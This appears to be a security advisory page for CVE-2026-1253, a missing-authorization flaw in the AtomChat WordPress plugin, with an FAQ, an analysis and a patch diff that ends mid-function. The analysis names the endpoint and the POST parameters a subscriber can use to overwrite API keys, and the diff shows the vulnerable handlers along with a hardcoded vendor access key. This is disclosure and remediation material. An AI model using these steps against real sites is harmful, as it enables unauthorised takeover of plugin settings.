What is CVE-2026-1253?

CVE-2026-1253 is a vulnerability in the Group Chat & Video Chat by AtomChat plugin for WordPress, specifically versions up to and including 1.1.7. It allows authenticated users with Subscriber-level access to modify plugin options due to missing capability checks in certain AJAX functions.

How does this vulnerability work?

The vulnerability arises from the absence of authorization checks in the ‘atomchat_update_auth_ajax’ and ‘atomchat_update_layout_ajax’ functions. Authenticated users can send POST requests to update critical plugin settings, including API keys and layout configurations, without proper permissions.

Who is affected by this vulnerability?

Any WordPress site using the Group Chat & Video Chat by AtomChat plugin version 1.1.7 or earlier is affected. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the AtomChat plugin installed. If it is version 1.1.7 or earlier, your site is at risk. Additionally, you can review user roles to see if any authenticated users have Subscriber-level access.

What is the severity of CVE-2026-1253?

CVE-2026-1253 has a CVSS score of 5.3, indicating a medium severity level. This means while the vulnerability does not grant full administrative access, it allows significant unauthorized modifications that can compromise the integrity of the plugin.

How can I fix this vulnerability?

To mitigate this vulnerability, update the AtomChat plugin to version 1.1.8 or later, where the issue has been patched. It is also advisable to review user roles and permissions to limit access to sensitive settings.

What does the patch for this vulnerability include?

The patch for CVE-2026-1253 introduces a centralized security function that verifies user capabilities and checks for nonces. It restructures the code to use proper WordPress AJAX action hooks, ensuring only authorized users can modify plugin settings.

What practical risks does this vulnerability pose?

If exploited, this vulnerability allows an attacker to change critical settings such as API keys and authentication keys, potentially disrupting chat services or enabling unauthorized access. Additionally, attackers can alter layout settings, impacting the user interface.

What is a proof of concept in this context?

The proof of concept for CVE-2026-1253 is a script that demonstrates how an attacker can exploit the vulnerability by sending crafted POST requests to the vulnerable AJAX endpoints. It requires a valid WordPress authentication cookie, showcasing the ease of exploitation.

How can I further secure my WordPress site against vulnerabilities?

To enhance security, regularly update all plugins and themes, implement strong user role management, and use security plugins that monitor for unauthorized changes. Additionally, consider conducting periodic security audits to identify and remediate vulnerabilities.

Is this vulnerability common in WordPress plugins?

While vulnerabilities can occur in any software, plugins with insufficient access controls are particularly susceptible. It is essential for developers to implement proper security measures and for administrators to stay informed about vulnerabilities affecting their installed plugins.

Where can I find more information about CVE-2026-1253?

Detailed information about CVE-2026-1253 can be found on the official CVE database and security advisory sites. Additionally, the plugin’s changelog and support forums may provide insights into the vulnerability and its resolution.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 25, 2026

CVE-2026-1253: Group Chat & Video Chat by AtomChat <= 1.1.7 – Missing Authorization to Authenticated (Subscriber+) Plugin Options Update (atomchat)

CVE ID CVE-2026-1253

Plugin atomchat

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 1.1.7

Patched Version 1.1.8

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1253:
The Group Chat & Video Chat by AtomChat WordPress plugin versions up to and including 1.1.7 contain a missing authorization vulnerability in two AJAX handler functions. This allows any authenticated user, including those with Subscriber-level permissions, to modify critical plugin options. The vulnerability has a CVSS score of 5.3 (Medium severity).

The root cause is the complete absence of capability checks and nonce verification in the ‘atomchat_update_auth_ajax’ and ‘atomchat_update_layout_ajax’ functions within the /atomchat/includes/atomchat_requesthandler.php file. These functions directly process POST parameters and update WordPress options without validating if the current user has administrative privileges. The vulnerable code executes when the ‘api’ request parameter equals specific values, bypassing standard WordPress AJAX action hooks.

Exploitation requires an attacker to have a valid WordPress authentication cookie. The attacker sends a POST request to /wp-admin/admin-ajax.php with the parameter ‘api=atomchat_update_auth_ajax’ or ‘api=atomchat_update_layout_ajax’. For authentication updates, the attacker includes ‘atomchat_auth_key’ and ‘atomchat_api_key’ parameters. For layout updates, they include ‘show_docked_layout_on_all_pages’ and ‘show_name_in_chat’ parameters. No nonce or special headers are required.

The patch introduces a centralized security function ‘atomchat_verify_admin_ajax’ that performs three checks. First, it verifies the user is logged in via ‘is_user_logged_in()’. Second, it checks for ‘manage_options’ capability using ‘current_user_can()’. Third, it validates a nonce with ‘check_ajax_referer()’ using the ‘atomchat_admin_action’ nonce. The patch also restructures the code to use proper WordPress AJAX action hooks (‘wp_ajax_*’) instead of direct ‘api’ parameter checking. Nonces are localized to admin JavaScript files via ‘wp_localize_script()’.

Successful exploitation allows attackers to modify sensitive plugin configuration. This includes changing API keys and authentication keys, which could disrupt chat functionality or enable unauthorized access to chat services. Attackers can also modify layout settings to alter the user interface. While the vulnerability doesn’t directly grant administrative access, it enables unauthorized modification of critical plugin data that should be restricted to administrators only.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/atomchat/admin/atomchat-admin.php
+++ b/atomchat/admin/atomchat-admin.php
@@ -1,9 +1,18 @@
 <?php

-wp_enqueue_style("atomchat-admin", dirname(plugin_dir_url( __FILE__ )).'/css/atomchat-admin.css');
-wp_enqueue_script("atomchat-event", dirname(plugin_dir_url( __FILE__ )).'/js/event.js');
-wp_enqueue_script("atomchat-admin", dirname(plugin_dir_url( __FILE__ )).'/js/atomchat-admin.js');
-wp_enqueue_script("atomchat-clipboard", dirname(dirname(dirname(dirname(plugin_dir_url( __FILE__ ))))).'/wp-includes/js/clipboard.min.js');
+$atomchat_asset_version = defined( 'ATOMCHAT_VERSION' ) ? ATOMCHAT_VERSION : '1.1.8';
+
+wp_enqueue_style( "atomchat-admin", dirname( plugin_dir_url( __FILE__ ) ) . '/css/atomchat-admin.css', array(), $atomchat_asset_version );
+wp_enqueue_script( "atomchat-event", dirname( plugin_dir_url( __FILE__ ) ) . '/js/event.js', array(), $atomchat_asset_version, false );
+wp_enqueue_script( "atomchat-admin", dirname( plugin_dir_url( __FILE__ ) ) . '/js/atomchat-admin.js', array(), $atomchat_asset_version, false );
+wp_localize_script(
+	'atomchat-admin',
+	'atomchatAjax',
+	array(
+		'nonce' => wp_create_nonce( 'atomchat_admin_action' ),
+	)
+);
+wp_enqueue_script( "atomchat-clipboard", dirname( dirname( dirname( dirname( plugin_dir_url( __FILE__ ) ) ) ) ) . '/wp-includes/js/clipboard.min.js', array(), $atomchat_asset_version, false );

 $isBuddyPressActive = $show_username = $show_nickname = $show_displayname = $show_fname_lname = '';
 if(!is_plugin_active('buddypress/bp-loader.php') && !is_plugin_active('buddyboss-platform/bp-loader.php')){
@@ -291,4 +300,4 @@
 		</div>
 	</div>
 </body>
-</html>
 No newline at end of file
+</html>
--- a/atomchat/admin/atomchat-auth.php
+++ b/atomchat/admin/atomchat-auth.php
@@ -1,7 +1,15 @@
 <?php
-	wp_enqueue_style("atomchat-admin", dirname(plugin_dir_url( __FILE__ )).'/css/atomchat-auth.css');
-	wp_enqueue_script("atomchat-event", dirname(plugin_dir_url( __FILE__ )).'/js/event.js');
-	wp_enqueue_script("atomchat-admin", dirname(plugin_dir_url( __FILE__ )).'/js/atomchat-admin.js');
+	$atomchat_asset_version = defined( 'ATOMCHAT_VERSION' ) ? ATOMCHAT_VERSION : '1.1.8';
+	wp_enqueue_style( "atomchat-admin", dirname( plugin_dir_url( __FILE__ ) ) . '/css/atomchat-auth.css', array(), $atomchat_asset_version );
+	wp_enqueue_script( "atomchat-event", dirname( plugin_dir_url( __FILE__ ) ) . '/js/event.js', array(), $atomchat_asset_version, false );
+	wp_enqueue_script( "atomchat-admin", dirname( plugin_dir_url( __FILE__ ) ) . '/js/atomchat-admin.js', array(), $atomchat_asset_version, false );
+	wp_localize_script(
+		'atomchat-admin',
+		'atomchatAjax',
+		array(
+			'nonce' => wp_create_nonce( 'atomchat_admin_action' ),
+		)
+	);
 ?>

 <!DOCTYPE html>
@@ -116,4 +124,4 @@
 }
 </script>
 </body>
-</html>
 No newline at end of file
+</html>
--- a/atomchat/admin/atomchat-ready.php
+++ b/atomchat/admin/atomchat-ready.php
@@ -1,6 +1,7 @@
 <?php
-	wp_enqueue_style("atomchat-admin", dirname(plugin_dir_url( __FILE__ )).'/css/atomchat-ready.css');
-	wp_enqueue_script("atomchat-event", dirname(plugin_dir_url( __FILE__ )).'/js/event.js');
+	$atomchat_asset_version = defined( 'ATOMCHAT_VERSION' ) ? ATOMCHAT_VERSION : '1.1.8';
+	wp_enqueue_style( "atomchat-admin", dirname( plugin_dir_url( __FILE__ ) ) . '/css/atomchat-ready.css', array(), $atomchat_asset_version );
+	wp_enqueue_script( "atomchat-event", dirname( plugin_dir_url( __FILE__ ) ) . '/js/event.js', array(), $atomchat_asset_version, false );
 ?>

 <!DOCTYPE html>
@@ -94,4 +95,4 @@
 }
 </script>
 </body>
-</html>
 No newline at end of file
+</html>
--- a/atomchat/atomchat.php
+++ b/atomchat/atomchat.php
@@ -3,7 +3,7 @@
 /**
 * Plugin Name: AtomChat
 * Description: Voice, video & text chat for your WordPress site
-* Version: 1.1.7
+* Version: 1.1.8
 * Author: AtomChat
 * Author URI: https://www.atomchat.com/
 * License: GPLv2 or later
@@ -79,6 +79,7 @@
 }

 include_once($dir);
+include_once plugin_dir_path( __FILE__ ) . 'includes/atomchat_requesthandler.php';


 /**
--- a/atomchat/includes/atomchat_cloud.php
+++ b/atomchat/includes/atomchat_cloud.php
@@ -1,6 +1,7 @@
 <?php

 $groupSync = get_option('atomchat_bp_group_sync');
+$atomchat_asset_version = defined( 'ATOMCHAT_VERSION' ) ? ATOMCHAT_VERSION : '1.1.8';

 /**
 * atomchatCreateBaseData
@@ -14,11 +15,11 @@
 		global $atomchat_base;

 		if(!empty($atomchat_base)) {
-			wp_enqueue_script( 'atomchat_base', plugin_dir_url( __DIR__ ).'js/scripttag.js');
+			wp_enqueue_script( 'atomchat_base', plugin_dir_url( __DIR__ ) . 'js/scripttag.js', array(), $atomchat_asset_version, false );
 			wp_add_inline_script( 'atomchat_base', 'var atomchat_base = '.$atomchat_base.';' );
 		}else{
 			if(get_option('atomchat_auth_key')){
-				wp_enqueue_script( 'atomchat_base', plugin_dir_url( __DIR__ ).'js/scripttag.js');
+				wp_enqueue_script( 'atomchat_base', plugin_dir_url( __DIR__ ) . 'js/scripttag.js', array(), $atomchat_asset_version, false );
 				wp_add_inline_script( 'atomchat_base', 'var chat_auth = "'.get_option('atomchat_auth_key').'";' );
 			}
 		}
@@ -36,8 +37,8 @@
 		global $atomchat_clientid;
 		global $atomchat_base;

-		wp_enqueue_style("atomchat_corecss", "//fast.cometondemand.net/".$atomchat_clientid."x_x".substr(md5($atomchat_clientid),0,5).".css");
-		wp_enqueue_script("atomchat_corejs", "//fast.cometondemand.net/".$atomchat_clientid."x_x".substr(md5($atomchat_clientid),0,5).".js");
+		wp_enqueue_style( "atomchat_corecss", "//fast.cometondemand.net/" . $atomchat_clientid . "x_x" . substr( md5( $atomchat_clientid ), 0, 5 ) . ".css", array(), $atomchat_asset_version );
+		wp_enqueue_script( "atomchat_corejs", "//fast.cometondemand.net/" . $atomchat_clientid . "x_x" . substr( md5( $atomchat_clientid ), 0, 5 ) . ".js", array(), $atomchat_asset_version, false );

 	}
 }
@@ -78,14 +79,14 @@
 		}

 		if($layout == 'docked'){
-			wp_enqueue_style("atomchat_corecss", "//fast.cometondemand.net/".$atomchat_clientid."x_x".substr(md5($atomchat_clientid),0,5).".css");
-			wp_enqueue_script("atomchat_corejs", "//fast.cometondemand.net/".$atomchat_clientid."x_x".substr(md5($atomchat_clientid),0,6).".js");
+			wp_enqueue_style( "atomchat_corecss", "//fast.cometondemand.net/" . $atomchat_clientid . "x_x" . substr( md5( $atomchat_clientid ), 0, 5 ) . ".css", array(), $atomchat_asset_version );
+			wp_enqueue_script( "atomchat_corejs", "//fast.cometondemand.net/" . $atomchat_clientid . "x_x" . substr( md5( $atomchat_clientid ), 0, 6 ) . ".js", array(), $atomchat_asset_version, false );
 			/** Force enabled AtomChat Docked Layout (6) in atomchat_corejs **/
 		} else{

-			wp_enqueue_script( 'atomchat_shortcodejs', '//fast.cometondemand.net/'.$atomchat_clientid."x_x".substr(md5($atomchat_clientid),0,5).'x_xcorex_xembedcode.js' );
+			wp_enqueue_script( 'atomchat_shortcodejs', '//fast.cometondemand.net/' . $atomchat_clientid . "x_x" . substr( md5( $atomchat_clientid ), 0, 5 ) . 'x_xcorex_xembedcode.js', array(), $atomchat_asset_version, false );

-			wp_enqueue_script( 'atomchat_shortcode', plugin_dir_url( __DIR__ ).'js/scripttag.js' );
+			wp_enqueue_script( 'atomchat_shortcode', plugin_dir_url( __DIR__ ) . 'js/scripttag.js', array(), $atomchat_asset_version, false );
 			wp_add_inline_script( 'atomchat_shortcode', 'var iframeObj = {};iframeObj.module="synergy";iframeObj.style="min-height:420px;min-width:350px;";iframeObj.width="'.$width.'px";iframeObj.height="'.$height.'px";iframeObj.src="//'.$atomchat_clientid.'.cometondemand.net/cometchat_embedded.php?'.$GUID.$groupsonly.'";if(typeof(addEmbedIframe)=="function"){addEmbedIframe(iframeObj);}' );

 			return '
--- a/atomchat/includes/atomchat_requesthandler.php
+++ b/atomchat/includes/atomchat_requesthandler.php
@@ -1,19 +1,50 @@
 <?php
+/**
+ * AtomChat request handlers.
+ *
+ * @package AtomChat
+ */
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+/**
+ * Shared permission and nonce check for AtomChat admin AJAX requests.
+ *
+ * @param string $nonce_action Nonce action.
+ */
+function atomchat_verify_admin_ajax( $nonce_action ) {
+	if ( ! is_user_logged_in() ) {
+		wp_send_json_error(
+			array(
+				'error' => __( 'You must be logged in.', 'atomchat' ),
+			),
+			401
+		);
+	}

-/***
-
-	* WordPress inbuild function used in this file
-	* wp_remote_get, wp_remote_retrieve_body and wp_die
-	* $wpdb - global variable used for database
-*/
+	if ( ! current_user_can( 'manage_options' ) ) {
+		wp_send_json_error(
+			array(
+				'error' => __( 'Insufficient permissions.', 'atomchat' ),
+			),
+			403
+		);
+	}

-$atomchatIntegration = 'wordpress';
+	if ( ! check_ajax_referer( $nonce_action, 'atomchat_nonce', false ) ) {
+		wp_send_json_error(
+			array(
+				'error' => __( 'Invalid nonce.', 'atomchat' ),
+			),
+			403
+		);
+	}
+}

 class AtomChatInstaller {
-/*
-	AtomChatInstaller  constructor
-*/
-	public $writablepath ;
+	public $writablepath;
 	public $latest_v;
 	public $atomchatPluginReferrer;
 	public $integration;
@@ -24,191 +55,239 @@
 	public $atomchat_api_response;
 	public $wpdb;
 	public $accessKey = 'flGBNxeq8Mgu5bynUhS5w3S2CJ7dfo3latMTxDNa';
+	public $basePath;

-	function __construct($arguments = array()){
-		$this->latest_v = !empty($arguments['latest_v']) ? $arguments['latest_v']: "";
-		$this->integration = !empty($arguments['integration']) ? $arguments['integration']: "";
-		$this->licensekey = !empty($arguments['licensekey']) ? $arguments['licensekey']: "";
-		$this->token = !empty($arguments['token']) ? $arguments['token']: "";
-		$this->target = !empty($arguments['target']) ? $arguments['target']: "";
-		$this->download_link = !empty($arguments['download_link']) ? $arguments['download_link']: "";
-		$this->atomchat_api_response = !empty($arguments['atomchat_api_response']) ? $arguments['atomchat_api_response']: "";
-		$this->wpdb = !empty($arguments['wpdb']) ? $arguments['wpdb']: "";
-		$this->basePath = dirname(dirname(__FILE__)).DIRECTORY_SEPARATOR;
-		ini_set('memory_limit', '-1');
+	/**
+	 * AtomChatInstaller constructor.
+	 *
+	 * @param array $arguments Installer arguments.
+	 */
+	public function __construct( $arguments = array() ) {
+		$this->latest_v              = ! empty( $arguments['latest_v'] ) ? $arguments['latest_v'] : '';
+		$this->integration           = ! empty( $arguments['integration'] ) ? $arguments['integration'] : '';
+		$this->licensekey            = ! empty( $arguments['licensekey'] ) ? $arguments['licensekey'] : '';
+		$this->token                 = ! empty( $arguments['token'] ) ? $arguments['token'] : '';
+		$this->target                = ! empty( $arguments['target'] ) ? $arguments['target'] : '';
+		$this->download_link         = ! empty( $arguments['download_link'] ) ? $arguments['download_link'] : '';
+		$this->atomchat_api_response = ! empty( $arguments['atomchat_api_response'] ) ? $arguments['atomchat_api_response'] : '';
+		$this->wpdb                  = ! empty( $arguments['wpdb'] ) ? $arguments['wpdb'] : '';
+		$this->basePath              = dirname( dirname( __FILE__ ) ) . DIRECTORY_SEPARATOR;
 	}

 	/**
-	 * atomchatCheckLicenseKey: check for valid license key
-	 * @param: license key
-	 * @return json response
-	*/
-	public function atomchatCheckLicenseKey(){
-		try{
-			$response = array();
-
-			$url = "https://app.atomchat.com/api-software/subscription?accessKey=".$this->accessKey;
-			$url .= "&licenseKey=".$this->licensekey;
-
-			/***WordPress remote call start ***/
-			$data = wp_remote_get( $url );
-	        $body = wp_remote_retrieve_body( $data );
-	        /***WordPress remote call end ***/
-
-			$licensedata = !empty($body) ? json_decode($body) : '';
-			$response['atomchat_api_response'] = !empty($body) ? $body : '';
-
-			/*** cms details start ***/
-			if(empty($this->integration)){
-				$atomchat_cms_file = (is_object($licensedata) && property_exists($licensedata, 'integration')) ? $licensedata->integration->file : 'standalone';
-			}else{
+	 * Validate a license key and return AtomChat API details.
+	 */
+	public function atomchatCheckLicenseKey() {
+		$response = array();
+
+		try {
+			$url  = 'https://app.atomchat.com/api-software/subscription?accessKey=' . rawurlencode( $this->accessKey );
+			$url .= '&licenseKey=' . rawurlencode( $this->licensekey );
+
+			$remote_response = wp_remote_get( $url );
+
+			if ( is_wp_error( $remote_response ) ) {
+				wp_send_json_error(
+					array(
+						'error'   => 1,
+						'message' => $remote_response->get_error_message(),
+					),
+					500
+				);
+			}
+
+			$body        = wp_remote_retrieve_body( $remote_response );
+			$licensedata = ! empty( $body ) ? json_decode( $body ) : '';
+
+			$response['atomchat_api_response'] = ! empty( $body ) ? $body : '';
+
+			if ( empty( $this->integration ) ) {
+				$atomchat_cms_file = ( is_object( $licensedata ) && property_exists( $licensedata, 'integration' ) ) ? $licensedata->integration->file : 'standalone';
+			} else {
 				$atomchat_cms_file = $this->integration;
 			}
-			/*** cms details end ***/
+			unset( $atomchat_cms_file ); // Kept for backward compatibility with existing flow.
+
+			$atomchat_cloud_active = ( is_object( $licensedata ) && property_exists( $licensedata, 'cloud' ) && ! empty( $licensedata->cloud ) ) ? 1 : 0;
+			if ( 1 === $atomchat_cloud_active ) {
+				$cookie_expiration = time() + ( 60 * 5 );
+				$cookie_secure     = is_ssl();
+
+				if ( PHP_VERSION_ID >= 70300 ) {
+					setcookie(
+						'atomchat_license_key',
+						$this->licensekey,
+						array(
+							'expires'  => $cookie_expiration,
+							'path'     => '/',
+							'secure'   => $cookie_secure,
+							'httponly' => true,
+							'samesite' => 'Lax',
+						)
+					);
+				} else {
+					setcookie( 'atomchat_license_key', $this->licensekey, $cookie_expiration, '/; samesite=Lax', '', $cookie_secure, true );
+				}

-			/*** cloud status start ***/
-			$atomchat_cloud_active = (is_object($licensedata) && property_exists($licensedata, 'cloud') && !empty($licensedata->cloud)) ? 1 : 0 ;
-			if($atomchat_cloud_active){
-				setcookie('atomchat_license_key', $this->licensekey, time() + (60 * 5), "/"); // 300 = 5 min
-				update_option('atomchat_license_key', $this->licensekey);
+				update_option( 'atomchat_license_key', $this->licensekey );
 			}
-			/*** cloud status end ***/

-			/*** success response ***/
-			if(!empty($licensedata) && is_object($licensedata) && property_exists($licensedata, 'success') && $licensedata->success == 1){
+			if ( ! empty( $licensedata ) && is_object( $licensedata ) && property_exists( $licensedata, 'success' ) && 1 === (int) $licensedata->success ) {
 				$response['success'] = 1;
-				$response['cloud'] = $licensedata->cloud;
-			}else{
-			/*** error response ***/
+				$response['cloud']   = isset( $licensedata->cloud ) ? $licensedata->cloud : 0;
+			} else {
 				$response['success'] = 0;
-				$response['error'] = (is_object($licensedata) && property_exists($licensedata, 'error')) ? $licensedata->error: 'License not found';
+				$response['error']   = ( is_object( $licensedata ) && property_exists( $licensedata, 'error' ) ) ? $licensedata->error : 'License not found';
 			}
-		} catch (Exception $e) {
-        	$response['error'] = 1;
+		} catch ( Exception $e ) {
+			$response['error']   = 1;
 			$response['message'] = $e->getMessage();
-    	}
-		header('Content-Type: application/json');
-		echo wp_json_encode($response);
-		wp_die();
-	}
-}
+		}

+		if ( isset( $response['success'] ) && 1 === (int) $response['success'] ) {
+			wp_send_json_success( $response );
+		}

-if (!empty($_REQUEST['api']) && $_REQUEST['api'] == 'atomchatCheckLicenseKey') {
-	$licensekey = (!empty($_REQUEST['licensekey']) && is_string($_REQUEST['licensekey'])) ? sanitize_text_field($_REQUEST['licensekey']) : "";
-	$update = new AtomChatInstaller(array('licensekey'=>$licensekey, 'integration'=>$atomchatIntegration, 'wpdb'=>$wpdb));
-	$update -> atomchatCheckLicenseKey();
-	wp_die();
+		wp_send_json_error( $response );
+	}
 }

-if( !function_exists( 'atomchat_friend_ajax' ) ) {
-	function atomchat_friend_ajax() {
-		$response = array();
+/**
+ * Handle AtomChat friend settings update.
+ */
+function atomchat_friend_ajax() {
+	atomchat_verify_admin_ajax( 'atomchat_admin_action' );
+
+	if ( isset( $_POST['atomchat_bp_group_sync'] ) ) {
+		$atomchat_bp_group_sync = sanitize_text_field( wp_unslash( $_POST['atomchat_bp_group_sync'] ) );
+		$update_sync_option     = ( 'true' === $atomchat_bp_group_sync ) ? 'true' : 'false';
+		update_option( 'atomchat_bp_group_sync', $update_sync_option, '', 'no' );
+	}

-		if(isset($_POST['atomchat_bp_group_sync']) && is_string($_POST['atomchat_bp_group_sync'])){
-			$update_sync_option = ($_POST['atomchat_bp_group_sync'] == 'true') ? 'true' : 'false';
-			update_option( 'atomchat_bp_group_sync' , $update_sync_option, '', 'no');
-		}
-		if(isset($_POST['atomchat_show_friends']) && is_string($_POST['atomchat_show_friends'])){
-			$update_friends_option = ($_POST['atomchat_show_friends'] == 'true') ? 'true' : 'false';
-			update_option( 'atomchat_show_friends' , $update_friends_option, '', 'no');
-			atomtchatCurlRequestToAPI('updateUserListSetting', array(
-				'setting_key' => 'atomchat_show_friends',
-				'setting_value' => $update_friends_option
+	if ( isset( $_POST['atomchat_show_friends'] ) ) {
+		$atomchat_show_friends = sanitize_text_field( wp_unslash( $_POST['atomchat_show_friends'] ) );
+		$update_friends_option = ( 'true' === $atomchat_show_friends ) ? 'true' : 'false';
+		update_option( 'atomchat_show_friends', $update_friends_option, '', 'no' );
+		atomtchatCurlRequestToAPI(
+			'updateUserListSetting',
+			array(
+				'setting_key'   => 'atomchat_show_friends',
+				'setting_value' => $update_friends_option,
 			)
 		);
-		}
-		header('Content-Type: application/json');
-		echo wp_json_encode(array('success' => 'settings updated successfully'));
-		wp_die();
 	}
+
+	wp_send_json_success( array( 'success' => 'settings updated successfully' ) );
 }

-if( !function_exists( 'atomchat_mycred_setting' ) ) {
-	function atomchat_mycred_setting() {
-		$response = array();
-		$atomchat_mycred_url = "";
-		if(isset($_POST['mycred_url'])){
-			$atomchat_mycred_url = (!empty($_POST['mycred_url']) && is_string($_POST['mycred_url'])) ? sanitize_text_field($_POST['mycred_url']) : "";
-		}
-		if(isset($_POST['atomchat_enable_mycred']) && is_string($_POST['atomchat_enable_mycred'])){
-			$atomchat_enable_mycred = ($_POST['atomchat_enable_mycred'] == 'true') ? 'true' : 'false';
-			update_option( 'atomchat_enable_mycred' , $atomchat_enable_mycred, '', 'no');
-			atomtchatCurlRequestToAPI('atomchat_mycred_setting', array(
-				'setting_key' => 'Enable_MyCred',
+/**
+ * Handle AtomChat MyCred settings update.
+ */
+function atomchat_mycred_setting() {
+	atomchat_verify_admin_ajax( 'atomchat_admin_action' );
+
+	$atomchat_mycred_url = '';
+	if ( isset( $_POST['mycred_url'] ) ) {
+		$atomchat_mycred_url = sanitize_text_field( wp_unslash( $_POST['mycred_url'] ) );
+	}
+
+	if ( isset( $_POST['atomchat_enable_mycred'] ) ) {
+		$atomchat_enable_mycred_raw = sanitize_text_field( wp_unslash( $_POST['atomchat_enable_mycred'] ) );
+		$atomchat_enable_mycred     = ( 'true' === $atomchat_enable_mycred_raw ) ? 'true' : 'false';
+		update_option( 'atomchat_enable_mycred', $atomchat_enable_mycred, '', 'no' );
+		atomtchatCurlRequestToAPI(
+			'atomchat_mycred_setting',
+			array(
+				'setting_key'   => 'Enable_MyCred',
 				'setting_value' => $atomchat_enable_mycred,
-				'mycred_url' => $atomchat_mycred_url
+				'mycred_url'    => $atomchat_mycred_url,
 			)
 		);
-		}
+	}

-		header('Content-Type: application/json');
-		echo wp_json_encode(array('success' => 'settings updated successfully'));
-		wp_die();
+	wp_send_json_success( array( 'success' => 'settings updated successfully' ) );
+}

+/**
+ * Handle AtomChat credits update.
+ */
+function atomchat_update_credeits() {
+	atomchat_verify_admin_ajax( 'atomchat_admin_action' );
+
+	$role = '';
+	if ( isset( $_POST['role'] ) ) {
+		$role = sanitize_key( wp_unslash( $_POST['role'] ) );
 	}
+
+	if ( '' === $role ) {
+		wp_send_json_error( array( 'error' => __( 'Invalid role.', 'atomchat' ) ), 400 );
+	}
+
+	$data                                = array();
+	$data['creditToDeduct']              = isset( $_POST['creditToDeduct'] ) ? (int) wp_unslash( $_POST['creditToDeduct'] ) : 0;
+	$data['creditOnMessage']             = isset( $_POST['creditOnMessage'] ) ? (int) wp_unslash( $_POST['creditOnMessage'] ) : 0;
+	$data['creditToDeductAudio']         = isset( $_POST['creditToDeductAudio'] ) ? (int) wp_unslash( $_POST['creditToDeductAudio'] ) : 0;
+	$data['creditToDeductAudioOnMinutes'] = isset( $_POST['creditToDeductAudioOnMinutes'] ) ? (int) wp_unslash( $_POST['creditToDeductAudioOnMinutes'] ) : 0;
+	$data['creditToDeductVideo']         = isset( $_POST['creditToDeductVideo'] ) ? (int) wp_unslash( $_POST['creditToDeductVideo'] ) : 0;
+	$data['creditToDeductVideoOnMinutes'] = isset( $_POST['creditToDeductVideoOnMinutes'] ) ? (int) wp_unslash( $_POST['creditToDeductVideoOnMinutes'] ) : 0;
+
+	update_option( 'atomchat_' . $role, $data );
+	wp_send_json_success( array( 'success' => 'settings updated successfully' ) );
 }

-if( !function_exists( 'atomchat_update_credeits' ) ) {
-	function atomchat_update_credeits(){
-		$data = array();
+/**
+ * Handle AtomChat auth settings update.
+ */
+function atomchat_update_auth_ajax() {
+	atomchat_verify_admin_ajax( 'atomchat_admin_action' );

-		if(!empty($_POST['role']) && is_string($_POST['role'])){
-			$role = sanitize_text_field($_POST['role']);
-		}
-		$data['creditToDeduct'] = (!empty($_POST['creditToDeduct']) && is_string($_POST['creditToDeduct'])) ? intval($_POST['creditToDeduct']) : 0;
-		$data['creditOnMessage'] = (!empty($_POST['creditOnMessage']) && is_string($_POST['creditOnMessage'])) ? intval($_POST['creditOnMessage']) : 0;
-		$data['creditToDeductAudio'] = (!empty($_POST['creditToDeductAudio']) && is_string($_POST['creditToDeductAudio'])) ? intval($_POST['creditToDeductAudio']) : 0;
-		$data['creditToDeductAudioOnMinutes'] = (!empty($_POST['creditToDeductAudioOnMinutes']) && is_string($_POST['creditToDeductAudioOnMinutes'])) ? intval($_POST['creditToDeductAudioOnMinutes']) : 0;
-		$data['creditToDeductVideo'] = (!empty($_POST['creditToDeductVideo']) && is_string($_POST['creditToDeductVideo'])) ? intval($_POST['creditToDeductVideo']) : 0;
-		$data['creditToDeductVideoOnMinutes'] = (!empty($_POST['creditToDeductVideoOnMinutes']) && is_string($_POST['creditToDeductVideoOnMinutes'])) ? intval($_POST['creditToDeductVideoOnMinutes']) : 0;
+	$atomchat_auth_key = isset( $_POST['atomchat_auth_key'] ) ? sanitize_text_field( wp_unslash( $_POST['atomchat_auth_key'] ) ) : '';
+	$atomchat_api_key  = isset( $_POST['atomchat_api_key'] ) ? sanitize_text_field( wp_unslash( $_POST['atomchat_api_key'] ) ) : '';

-		update_option('atomchat_'.$role , serialize($data));
-		header('Content-Type: application/json');
-		echo wp_json_encode(array('success' => 'settings updated successfully'));
-		wp_die();
+	update_option( 'atomchat_auth_key', $atomchat_auth_key );
+	update_option( 'atomchat_api_key', $atomchat_api_key );

-	}
+	wp_send_json_success( array( 'success' => 'auth key updated successfully' ) );
 }

-if( !function_exists( 'atomchat_update_auth_ajax' ) ) {
-	function atomchat_update_auth_ajax() {
-		$response = array();
-		$atomchat_auth_key = (!empty($_POST['atomchat_auth_key']) && is_string($_POST['atomchat_auth_key'])) ? sanitize_text_field($_POST['atomchat_auth_key']) : '';
-		$atomchat_api_key = (!empty($_POST['atomchat_api_key']) && is_string($_POST['atomchat_api_key'])) ? sanitize_text_field($_POST['atomchat_api_key']) : '';
-		update_option( 'atomchat_auth_key' , $atomchat_auth_key);
-		update_option( 'atomchat_api_key' , $atomchat_api_key);
-		header('Content-Type: application/json');
-		echo wp_json_encode(array('success' => 'auth key updated successfully'));
-		wp_die();
-	}
-}
+/**
+ * Handle AtomChat layout settings update.
+ */
+function atomchat_update_layout_ajax() {
+	atomchat_verify_admin_ajax( 'atomchat_admin_action' );

-if( !function_exists( 'atomchat_update_layout_ajax' ) ) {
-	function atomchat_update_layout_ajax() {
-		$response = array();
-		$show_docked_layout_on_all_pages = (!empty($_POST['show_docked_layout_on_all_pages']) && is_string($_POST['show_docked_layout_on_all_pages'])) ? sanitize_text_field($_POST['show_docked_layout_on_all_pages']) : '';
-		$show_name_in_chat = (!empty($_POST['show_name_in_chat']) && is_string($_POST['show_name_in_chat'])) ? sanitize_text_field($_POST['show_name_in_chat']) : '';
-		update_option( 'show_docked_layout_on_all_pages' , $show_docked_layout_on_all_pages);
-		update_option( 'show_name_in_chat' , $show_name_in_chat);
-		header('Content-Type: application/json');
-		echo wp_json_encode(array('success' => 'layout settings updated successfully'));
-		wp_die();
-	}
-}
+	$show_docked_layout_on_all_pages = isset( $_POST['show_docked_layout_on_all_pages'] ) ? sanitize_text_field( wp_unslash( $_POST['show_docked_layout_on_all_pages'] ) ) : '';
+	$show_name_in_chat               = isset( $_POST['show_name_in_chat'] ) ? sanitize_text_field( wp_unslash( $_POST['show_name_in_chat'] ) ) : '';

